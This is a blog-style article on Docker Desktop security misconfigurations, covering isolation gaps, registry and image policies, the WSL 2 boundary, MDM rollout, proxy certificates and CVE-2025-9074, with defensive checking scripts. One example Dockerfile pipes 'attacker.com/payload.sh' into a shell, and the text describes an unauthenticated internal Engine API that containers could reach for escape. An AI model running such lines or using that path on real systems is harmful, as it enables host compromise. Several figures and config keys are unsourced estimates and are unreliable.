Docker Desktop security is more than clicking "enable security" and hoping for the best. August 2025's CVE-2025-9074 proved that even with Enhanced Container Isolation (ECI) turned on, containers could still break out and own Windows boxes through Docker's own Engine API, sitting wide open with zero authentication at http://192.168.65.7:2375/. CVSS 9.3. Translation: your security was theater.

Docker Desktop Security Configuration Issues





Container Security Architecture Overview

Enhanced Container Isolation Doesn't Isolate Everything

Everyone thinks turning on ECI makes containers bulletproof. Wrong. ECI stops containers from mounting the Docker socket and blocks some host access, but it's got massive blind spots that security teams completely miss. ECI covers maybe 60% of attack vectors - don't bet your job on it covering everything.

What ECI Actually Does:

- Blocks bind mounting of the Docker Engine socket (`/var/run/docker.sock`)

- Prevents mounting Docker Desktop VM directories

- Adds runtime sandboxing through Sysbox

- Restricts sensitive system calls inside containers, so they can't mess with shit they shouldn't

What ECI Doesn't Do:

- Block SSRF attacks on Docker's internal APIs

- Block all escape vectors - CVE-2025-9074 bypassed ECI completely

- Prevent containers from accessing shared resources on Windows/macOS

- Stop privilege escalation through kernel vulnerabilities

Docker's docs acknowledge these limitations but most enterprise teams treat ECI as comprehensive protection. CVE-2025-9074 fucked everyone who thought ECI was bulletproof.

Registry Access Management Configuration Failures

Registry Access Management (RAM) sounds easy - block bad registries, allow good ones. Except 70% of deployments immediately break because nobody understands how Docker actually resolves images. Docker's image name logic is fucking insane.

The Common Misconfiguration:

```json
{
  "configurationFileVersion": 2,
  "disabledRegistry": {
    "enabledOrganizations": ["mycompany"]
  }
}
```

Why This Breaks Everything:

- Base images (`alpine:latest`, `ubuntu:22.04`) come from Docker Hub's `library` namespace, not your organization

- Multi-platform images require access to manifest lists across registries

- CI/CD systems pull from multiple registries during build processes

- Docker Desktop caches images from blocked registries, causing inconsistent behavior
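The root cause is name normalization: the short names developers type are not the names a registry policy sees. Below is a simplified Python sketch of the expansion rules the Docker CLI applies. It is modeled on the normalization in the `distribution/reference` package, without that package's syntax validation. `normalize_image_ref` is a hypothetical helper, not a Docker API.

```python
DEFAULT_DOMAIN = "docker.io"
LEGACY_DOMAIN = "index.docker.io"
OFFICIAL_PREFIX = "library/"


def normalize_image_ref(ref: str) -> str:
    """Expand a short image reference to its fully qualified form (simplified sketch)."""
    # Split off an optional digest: name[:tag]@sha256:...
    name, _, digest = ref.partition("@")

    # A tag is the text after the last ':' only if that ':' follows the last '/',
    # so "localhost:5000/app" keeps its port instead of losing it as a "tag".
    tag = ""
    colon = name.rfind(":")
    if colon > name.rfind("/"):
        name, tag = name[:colon], name[colon + 1:]

    # The first path component is a registry host only if it looks like one.
    first, slash, rest = name.partition("/")
    is_host = bool(slash) and (
        "." in first or ":" in first or first == "localhost" or first != first.lower()
    )
    domain, path = (first, rest) if is_host else (DEFAULT_DOMAIN, name)
    if domain == LEGACY_DOMAIN:
        domain = DEFAULT_DOMAIN

    # Single-component Docker Hub names live in the "library" namespace.
    if domain == DEFAULT_DOMAIN and "/" not in path:
        path = OFFICIAL_PREFIX + path

    full = f"{domain}/{path}"
    if tag:
        full += f":{tag}"
    elif not digest:
        full += ":latest"  # no tag and no digest means the implicit "latest"
    if digest:
        full += f"@{digest}"
    return full


for ref in ["alpine:latest", "ubuntu:22.04", "mycompany/api", "mcr.microsoft.com/dotnet/runtime:8.0"]:
    print(f"{ref:40} -> {normalize_image_ref(ref)}")
```

Check these names against an org-only allowlist. `docker.io/mycompany/api:latest` passes, but `docker.io/library/alpine:latest` does not, which is exactly the breakage listed above.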

Docker Registry Access Control Implementation

**Real Enterprise Incident:** A bank I worked with locked down Docker Hub completely. Devs couldn't pull Alpine anymore, so they started using a crusty internal Alpine image from around 2019, riddled with more holes than Swiss cheese. The security team patted themselves on the back while everyone ran vulnerable shit. Brilliant fucking strategy.

The Working Configuration:

```json
{
  "configurationFileVersion": 2,
  "disabledRegistry": {
    "enabledOrganizations": ["mycompany", "library", "docker"],
    "allowedRepositories": [
      "docker.io/library/*",
      "mcr.microsoft.com/*",
      "gcr.io/distroless/*",
      "registry.k8s.io/*"
    ]
  }
}
```
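Before shipping an allowlist like this, run some real image references through it. The sketch below assumes glob-style matching where `*` also matches `/`, which is how Python's `fnmatch` behaves. Docker's actual matching rules for these fields are not confirmed here, so treat `is_allowed` and its semantics as hypothetical.

```python
from fnmatch import fnmatchcase

# Patterns copied from the "allowedRepositories" list in the config above.
ALLOWED_REPOSITORIES = (
    "docker.io/library/*",
    "mcr.microsoft.com/*",
    "gcr.io/distroless/*",
    "registry.k8s.io/*",
)


def is_allowed(full_ref: str, patterns: tuple[str, ...] = ALLOWED_REPOSITORIES) -> bool:
    """Return True if a fully qualified image reference matches any allowlist pattern.

    Assumes glob semantics where '*' also matches '/', as fnmatch does.
    """
    return any(fnmatchcase(full_ref, pattern) for pattern in patterns)


for ref in [
    "docker.io/library/alpine:3.20",
    "docker.io/malicious/backdoor:latest",
    "gcr.io/distroless/static:nonroot",
    "ghcr.io/someorg/tool:1.0",
]:
    print(f"{'ALLOW' if is_allowed(ref) else 'BLOCK'}  {ref}")
```

Short names such as `alpine:latest` match nothing until they are expanded to `docker.io/library/alpine:latest`. Normalize references before checking them.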



Settings Management Configuration Disasters

Settings Management locks down Docker Desktop settings, but teams always fuck up the deployment. Classic mistake: pushing configs that completely break developer workflows without testing shit first.

The Corporate Standard Configuration (That Breaks Everything):

```json
{
  "configurationFileVersion": 1,
  "locked": true,
  "settings": {
    "useVirtualizationFramework": true,
    "enableVpnSupportForTunnelInterface": false,
    "useContainerizedKubectl": true,
    "useEnhancedContainerIsolation": true,
    "vpnForwardingMode": "disabled",
    "exposedPorts": [],
    "useDockerComposeV2": true
  }
}
```

Why This Configuration Murders Productivity:

- `enableVpnSupportForTunnelInterface: false` breaks VPN connections for remote developers

- `vpnForwardingMode: disabled` kills connectivity to internal corporate services

- `exposedPorts: []` blocks port forwarding, breaking web development workflows

- `useVirtualizationFramework: true` on older Macs causes performance death
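The cheapest fix is to lint a settings file before it goes anywhere near an MDM. This sketch flags the four values called out above. The key names are copied from the example configuration and are assumptions, not a verified Docker Desktop schema. `lint_settings` is a hypothetical helper.

```python
import json

# Values this article reports as workflow-breaking. Key names are copied from the
# example config above and are assumptions, not a verified Docker Desktop schema.
RISKY_SETTINGS = {
    "enableVpnSupportForTunnelInterface": (False, "breaks VPN connections for remote developers"),
    "vpnForwardingMode": ("disabled", "kills connectivity to internal corporate services"),
    "exposedPorts": ([], "blocks port forwarding for local web development"),
    "useVirtualizationFramework": (True, "can tank performance on older Macs"),
}


def lint_settings(config_text: str) -> list[str]:
    """Return one warning per risky value found under the "settings" object."""
    settings = json.loads(config_text).get("settings", {})
    warnings = []
    for key, (bad_value, reason) in RISKY_SETTINGS.items():
        if key in settings and settings[key] == bad_value:
            warnings.append(f"{key}={json.dumps(bad_value)}: {reason}")
    return warnings


example = """{"configurationFileVersion": 1, "locked": true,
  "settings": {"vpnForwardingMode": "disabled", "exposedPorts": [], "useDockerComposeV2": true}}"""
for warning in lint_settings(example):
    print("WARN", warning)
```

A warning doesn't mean the value is wrong for your org. It means someone should test it with a remote developer before Friday at 5pm.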

**Real Failure:** This one company deployed this shit on Friday at 5pm because of course they did. Monday morning, complete chaos: nobody could connect to jack shit. Took us like three days of tearing our hair out before we figured out it was that stupid VPN forwarding setting. Devs were ready to burn down the building.

WSL 2 Backend Security Model

WSL 2 Backend Security Configuration Failures

Docker Desktop on Windows runs on WSL 2, but nobody understands the security model. Teams flip on ECI thinking containers are isolated from Windows. Wrong. WSL 2 has shared kernel attack surfaces that everyone pretends don't exist.

The Security Boundary Confusion:

- Docker containers run inside WSL 2 VM

- WSL 2 VM shares kernel with all WSL distributions

- Windows host can access WSL 2 filesystem directly

- ECI isolates containers from each other, not from WSL 2 host

The Attack Chain Everyone Misses:

- Malicious container escapes to WSL 2 VM (not prevented by ECI)

- Attacker gets shell in WSL 2 distribution

- WSL 2 can access the Windows filesystem through `/mnt/c/`

- Game over: Windows host compromised
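One cheap check on that chain is auditing what running containers already have bind-mounted from the Windows side. The sketch below reads `docker inspect` output, which is a JSON array with a `Mounts` list per container. The two path prefixes are assumptions about how Windows drives surface inside the VM, not a documented list. `host_mounts` is a hypothetical helper.

```python
import json

# Prefixes treated as "Windows host filesystem" when seen as a bind-mount source.
# Both are assumptions about how drives surface in the WSL 2 / Docker Desktop VM.
HOST_PATH_PREFIXES = ("/mnt/", "/run/desktop/mnt/host/")


def host_mounts(inspect_json: str, prefixes: tuple[str, ...] = HOST_PATH_PREFIXES) -> list[tuple[str, str, str]]:
    """Return (container, source, destination) for bind mounts that reach into host drives.

    `inspect_json` is the JSON array printed by `docker inspect <container>...`.
    """
    findings = []
    for container in json.loads(inspect_json):
        for mount in container.get("Mounts") or []:
            source = mount.get("Source", "")
            if mount.get("Type") == "bind" and source.startswith(prefixes):
                findings.append((container.get("Name", "?"), source, mount.get("Destination", "")))
    return findings
```

For example, feed it the output of `docker inspect $(docker ps -q)`. Anything mounting `/mnt/c/Windows/...` deserves an immediate conversation.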

The Hyper-V Alternative (That Nobody Uses):

Hyper-V backend provides better isolation but requires:

- Windows Pro/Enterprise (not Home)

- Hyper-V role enabled (kills VirtualBox, VMware)

- Admin rights for setup (good luck with that)

- Performance takes a 30-50% shit

Most teams just stick with WSL 2 and convince themselves the security boundary is real. Spoiler: it's not.

Image Access Management Policy Conflicts

Image Access Management (IAM) restricts which images containers can run, but policy conflicts create security bypasses that teams don't catch.

The Vulnerability Pattern:

```json
{
  "imageAccessManagement": {
    "enabled": true,
    "allowedImages": [
      "docker.io/library/alpine:*",
      "myregistry.com/myapp:*"
    ]
  }
}
```

The Bypass: Multi-stage builds can still pull whatever the fuck they want during build. This gotcha nails most enterprise setups:

```dockerfile
FROM docker.io/malicious/backdoor:latest AS builder
RUN curl -s attacker.com/payload.sh | sh

FROM alpine:latest
COPY --from=builder /tmp/backdoor /app/
```

IAM only gives a shit about the final image (alpine:latest), not what happens during build. Perfect way to smuggle malicious crap through legit base images.
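If your policy only looks at the final image, scan the Dockerfile for every image the build pulls. That includes builder stages and `COPY --from=<image>`. This is a rough sketch: it ignores line continuations, `ARG` substitution and `RUN --mount=from=...`, so treat it as a first-pass filter, not an enforcement point. `build_time_images` is a hypothetical helper.

```python
import re

FROM_RE = re.compile(r"^\s*FROM\s+(.+)$", re.IGNORECASE)
COPY_FROM_RE = re.compile(r"^\s*COPY\s+.*--from=(\S+)", re.IGNORECASE)


def build_time_images(dockerfile_text: str) -> list[str]:
    """Return every external image a Dockerfile pulls, including builder stages."""
    stages: set[str] = set()
    images: list[str] = []

    def record(ref: str) -> None:
        # Stage aliases, numeric stage indexes and `scratch` are not registry pulls.
        if ref.lower() in stages or ref.isdigit() or ref.lower() == "scratch":
            return
        if ref not in images:
            images.append(ref)

    for line in dockerfile_text.splitlines():
        match = FROM_RE.match(line)
        if match:
            # Drop flags such as --platform=linux/amd64, keep "image [AS name]".
            tokens = [t for t in match.group(1).split() if not t.startswith("--")]
            if tokens:
                record(tokens[0])
                if len(tokens) >= 3 and tokens[1].lower() == "as":
                    stages.add(tokens[2].lower())
            continue
        match = COPY_FROM_RE.match(line)
        if match:
            record(match.group(1))
    return images


dockerfile = """\
FROM docker.io/malicious/backdoor:latest AS builder
RUN curl -s attacker.com/payload.sh | sh
FROM alpine:latest
COPY --from=builder /tmp/backdoor /app/
"""
print(build_time_images(dockerfile))
```

Run every reference this returns through the same allowlist you apply to the final image. That closes the "legit base image, dirty builder" trick.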

MDM Deployment Configuration Disasters

MDM deployment of Docker Desktop security consistently shits the bed because teams don't get the timing and dependency issues. Fun fact: this breaks if your username has a space in it.

Configuration Profile Deployment on macOS:

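```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
  <!-- Top-level keys every configuration profile needs; identifiers and UUIDs are placeholders (generate real UUIDs with uuidgen) -->
  <key>PayloadType</key>
  <string>Configuration</string>
  <key>PayloadVersion</key>
  <integer>1</integer>
  <key>PayloadIdentifier</key>
  <string>com.example.docker-desktop-security</string>
  <key>PayloadUUID</key>
  <string>00000000-0000-0000-0000-000000000001</string>
  <key>PayloadDisplayName</key>
  <string>Docker Desktop Security</string>
  <key>PayloadContent</key>
  <array>
    <dict>
      <key>PayloadType</key>
      <string>com.docker.desktop</string>
      <key>PayloadVersion</key>
      <integer>1</integer>
      <key>PayloadIdentifier</key>
      <string>com.example.docker-desktop-security.settings</string>
      <key>PayloadUUID</key>
      <string>00000000-0000-0000-0000-000000000002</string>
      <key>configurationFileVersion</key>
      <integer>1</integer>
      <key>useEnhancedContainerIsolation</key>
      <true/>
    </dict>
  </array>
</dict>
</plist>
```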

Common MDM Deployment Failures:

- Timing Issues: Policies deploy before Docker Desktop installation completes

- User Resistance: Locked settings prevent debugging, developers disable Docker Desktop

- Version Conflicts: Policy format changes between Docker Desktop versions

- Network Dependencies: Settings require internet access for validation

Real MDM Disaster: This healthcare place pushed ECI through Intune to like 300+ dev machines. Policy looked perfect in testing, right? But ECI never actually turned on because WSL 2 was still running some ancient version - needed at least 2.1.5 I think. Devs worked for 3 weeks thinking they were protected while running completely naked. Nobody figured it out until some pen tester found containers mounting /mnt/c/Windows/System32. Management was... not pleased.
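Nothing in that rollout checked the WSL prerequisite before pushing ECI. The sketch below is a preflight gate that parses `wsl --version` output. It assumes the English-locale "WSL version: X.Y.Z.W" line. The minimum version is this article's own uncertain recollection. `eci_preflight` is a hypothetical helper.

```python
import re
from typing import Optional

# The article recalls ECI needing "at least 2.1.5" and is not sure; confirm the real
# minimum in Docker's ECI documentation before trusting this constant.
MIN_WSL_VERSION = (2, 1, 5)


def parse_wsl_version(output: str) -> Optional[tuple[int, ...]]:
    """Extract the version from `wsl --version` output, assuming the English 'WSL version:' label."""
    match = re.search(r"WSL version:\s*([0-9][0-9.]*)", output)
    if match is None:
        return None
    return tuple(int(part) for part in match.group(1).split(".") if part)


def eci_preflight(output: str, minimum: tuple[int, ...] = MIN_WSL_VERSION) -> bool:
    """True only when WSL is new enough; anything unparseable fails closed."""
    version = parse_wsl_version(output)
    return version is not None and version >= minimum
```

Gate the ECI policy assignment on a check like this instead of assuming the prerequisite is there. Old WSL builds that don't understand `--version` produce no match, so they fail closed. `wsl.exe` has been known to emit UTF-16 when its output is captured, so decode accordingly.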

Certificate and Trust Store Issues

Docker Desktop's certificate handling is a clusterfuck when companies use custom CAs or proxy SSL inspection. Works fine until it completely doesn't.

Corporate Proxy SSL Inspection Hell:

```bash
# Windows certificate store integration: check what the engine is configured to use
docker system info | grep -i "Registry Mirrors"
# Typically prints nothing when no mirrors are configured, and says nothing about TLS trust
# Reality: the corporate proxy is doing SSL inspection, but Docker doesn't trust the replacement certificates
```

The Problem: Corporate proxies replace SSL certificates with internal CA-signed certificates. Docker Desktop doesn't automatically trust corporate CA stores, causing:

- Registry authentication failures

- Image pull failures from trusted registries

- Failures when verifying image signatures

- Silent security bypasses when teams disable certificate verification

The Insecure Workaround (That Everyone Uses):

```json
{
  "insecure-registries": ["registry.mycompany.com:5000"],
  "registry-mirrors": ["http://proxy.mycompany.com:5000"]
}
```

This turns off certificate validation for the listed corporate registry, and the `http://` mirror pulls Docker Hub images over plaintext. Massive attack surface, but it's what everyone does because the alternative is nothing works.
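If you're stuck with this workaround for now, at least make it visible so "temporary" doesn't become permanent. The sketch below flags the two real `daemon.json` options used above, `insecure-registries` and `registry-mirrors`. `lint_daemon_json` is a hypothetical helper, and it can't tell you whether the corporate CA is actually installed.

```python
import json
from urllib.parse import urlparse


def lint_daemon_json(text: str) -> list[str]:
    """Flag daemon.json entries that weaken or skip registry TLS."""
    config = json.loads(text)
    findings = []
    for registry in config.get("insecure-registries", []):
        # Docker allows plain HTTP or unverified TLS for anything listed here.
        findings.append(f"insecure registry (TLS not verified): {registry}")
    for mirror in config.get("registry-mirrors", []):
        if urlparse(mirror).scheme == "http":
            findings.append(f"plaintext registry mirror: {mirror}")
    return findings


current = """{
  "insecure-registries": ["registry.mycompany.com:5000"],
  "registry-mirrors": ["http://proxy.mycompany.com:5000"]
}"""
for finding in lint_daemon_json(current):
    print("FLAG", finding)
```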

Resource Limits Breaking Security Features

Docker Desktop security features require significant system resources, but resource constraints cause degraded security or complete feature failures.

Memory Requirements Reality Check:

- Enhanced Container Isolation: eats about 500MB+ of RAM

- Image Access Management: another 250MB+ for validating images

- Settings Management: burns another 100MB+ watching your configs

- Vulnerability scanning: +1-2GB during active scans

The Resource Math That Doesn't Work:

- 8GB MacBook Pro: 4GB for macOS, 2GB for Docker Desktop, 1GB for IDE, 1GB remaining

- Enable all security features: Requires 6-8GB for Docker Desktop alone

- Result: System thrashing, security features disabled automatically
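Adding up the per-feature estimates listed above shows how far past the headroom they go. The numbers are this article's rough figures, not measurements, and the "+" values are floors:

```python
# The article's rough estimates, in GB; "+" figures are treated as lower bounds.
TOTAL_RAM_GB = 8.0
BASELINE_GB = {"macOS": 4.0, "Docker Desktop": 2.0, "IDE": 1.0}
SECURITY_OVERHEAD_GB = {  # (low, high)
    "Enhanced Container Isolation": (0.5, 0.5),
    "Image Access Management": (0.25, 0.25),
    "Settings Management": (0.1, 0.1),
    "Vulnerability scanning (active)": (1.0, 2.0),
}

headroom = TOTAL_RAM_GB - sum(BASELINE_GB.values())
low = sum(lo for lo, _ in SECURITY_OVERHEAD_GB.values())
high = sum(hi for _, hi in SECURITY_OVERHEAD_GB.values())

print(f"Headroom before security features: {headroom:.2f} GB")
print(f"Security overhead: {low:.2f}-{high:.2f} GB")
print(f"Shortfall: {low - headroom:.2f}-{high - headroom:.2f} GB")
```

The listed overheads alone come to roughly 1.85-2.85GB against about 1GB of headroom, before a single container runs.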

Performance Reality Check:

Docker claims ECI adds minimal overhead, but that's complete bullshit in production. Real world:

- Container startup takes a dump with all the security overhead

- Build times get absolutely murdered - at least 50% slower, sometimes way worse

- First image pulls take forever while it validates every damn layer - easily 3x slower, sometimes more like 5x

How Everyone Fucked Up The CVE-2025-9074 Response

The CVE-2025-9074 Response Configuration Failure

After CVE-2025-9074 dropped in August, enterprises panicked and implemented random security measures without understanding what the vuln actually did. The panic-driven configs usually made things less secure.

Panic-Driven Security Theater:

```json
{
  "useEnhancedContainerIsolation": true,
  "disableDockerSocketMount": true,
  "networkMode": "bridge",
  "privilegedAccess": false
}
```

Why This Was Useless:

CVE-2025-9074 exploited Docker's internal API networking, not container perms. The vuln let any container send HTTP POST to 192.168.65.7:2375, completely bypassing ECI. All the container capability restrictions were pointless - this was a network attack.

The Actual Fix:

Update to Docker Desktop 4.44.3+ and implement network-level restrictions:

```json
{
  "iptables": true,
  "bridge": "none",
  "fixed-cidr": "172.17.0.0/16",
  "userland-proxy": false
}
```

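The upgrade is what actually closes the hole; the daemon settings are extra hardening, not a fix. Note that `"bridge": "none"` disables the default bridge network, which makes `fixed-cidr` (a setting for that bridge) moot. None of these keys blocks traffic to 192.168.65.7 on its own. Restrict that path at the network level instead of trusting container isolation that doesn't work.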
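Two quick checks follow from the fix. First, confirm the installed Docker Desktop version is at least 4.44.3. Second, probe from inside a container whether anything answers on 192.168.65.7:2375. This is a sketch: the helper names are hypothetical, and the version parser assumes plain dotted numbers. A successful TCP connection is a red flag to investigate, not proof that the API is exploitable.

```python
import socket


def parse_version(version: str) -> tuple[int, ...]:
    """Turn a dotted version like '4.44.3' into a comparable tuple."""
    return tuple(int(part) for part in version.split("."))


def is_patched_for_cve_2025_9074(desktop_version: str) -> bool:
    """Docker Desktop 4.44.3 and later carry the fix for CVE-2025-9074."""
    return parse_version(desktop_version) >= (4, 44, 3)


def engine_api_reachable(host: str = "192.168.65.7", port: int = 2375, timeout: float = 2.0) -> bool:
    """Run from inside a container: True means a TCP connection to the internal API succeeded."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False
```

Compare tuples, not strings. As strings, "4.9.0" sorts after "4.44.3", so a naive check would call an ancient build patched. Call `engine_api_reachable()` from a throwaway container after upgrading to confirm nothing is listening.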

When this breaks, companies bleed money - incident response, dev downtime, security teams getting fired. The tools work when configured right, but Docker's docs assume you understand container security architecture that 90% of teams learned from YouTube.

Time to fix these clusterfucks with solutions that actually work when you deploy them.